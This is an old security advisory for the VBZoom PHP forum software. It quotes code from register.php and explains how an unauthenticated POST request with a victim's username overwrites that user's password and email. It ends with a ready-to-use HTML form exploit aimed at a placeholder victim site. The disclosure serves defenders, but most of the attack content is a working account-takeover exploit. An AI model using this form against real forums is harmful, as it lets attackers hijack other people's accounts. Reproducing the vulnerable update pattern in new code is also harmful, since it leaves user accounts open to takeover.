Name: VBZoom Version Affected: tested on v1.01 maybe other version vulnerable also Severity: Critical Category: Password reset Vendor URL: http://www.vbzoom.com Author: hish_hish <hish_hish565@hotmail.com> Date: discloused on 28th August 2002 Published at 8th oct 2002 Description *********** VBZooM is bulletin board system which written in php, the problem lay on sql query in file register.php. and you can reset any user's password (see Details). Details ******* see these few lines from register.php: 1: If ($ChangeProfile==1 And ($VBZooMForumCookiesUserName=="" or 2: $VBZooMForumCookiesUserName=="deleted")) 3: { 4: include("admin/config.php"); 5: include("style/style.php"); 6: Echo"<BR>"; : : 9: include("login.php"); // wooow here will catch us, so we want to pass this block. : : 10: Exit(); 11: } : : 14: if ($REQUEST_METHOD=="POST") 15: { 16: if($ChangeProfile==1 And $UserName!="") 17: { 18: include("admin/config.php"); 19: $Connect =mysql_connect($DBHostName,$DBUserName,$DBPassword); 20: $Select =mysql_select_db($DBName,$Connect); : : : 24: $Sql = "UPDATE Member Set Password='$Password',Email='$Email', Gender='$Gender',Style='1',HomePage='$HomePage',Photo='$Photo', Icq='$Icq',Hotmail='$Hotmail', Yahoo='$Yahoo',BirthDate='$BirthDate',Country='$Country',Hobby='$Hobby', Job='$Job',Signature='$Signature',AllowEmail='$AllowEmail', AllowMail='$AllowMail',AllowMessage='$AllowMessage', AllowMailCaseMessage='$AllowMailCaseMessage' where UserName='$UserName'"; 31: $Result = mysql_query($Sql); 32: If ($Result) { 34: setcookie ("VBZooMForumCookiesUserName","$UserName",time()+604800); 35: setcookie ("VBZooMForumCookiesPassword", "$Password",time()+604800); we don't want to execute the block between line 3 and 11 so we pass invalid values to if statment (line 1). the lame sql statment lies at line 24 , and it's inside the block (line 14 and 35). so we will pass valid values to reach the sql statment as follow: make <form method="POST" action="register.php"> // to enter block in line 14 assigne 1 to variable $ChangeProfile, and victim UserName to reset his password lines 18 - 20 no comment !! lines 24 - 35 :) Exploit code ************** <form name="f1" action="http://www.victim.com/vbzoom/register.php"; method="POST"> <input type="hidden" name="ChangeProfile" value="1"> User Name: <input type="text" name="UserName"><br> Password: <input type="text" name="Password"><br> Email: <input type="text" name="Email"> <input type="hidden" name="HomePage" value="lamerZ"> <input type="hidden" name="VBZooMForumCookiesUserName" value="false"> <input type="hidden" name="VBZooMForumCookiesUserName" value="false"> <input type="submit" value="reset password"> </form> Fix Information *************** Contact http://www.vbzoom.com
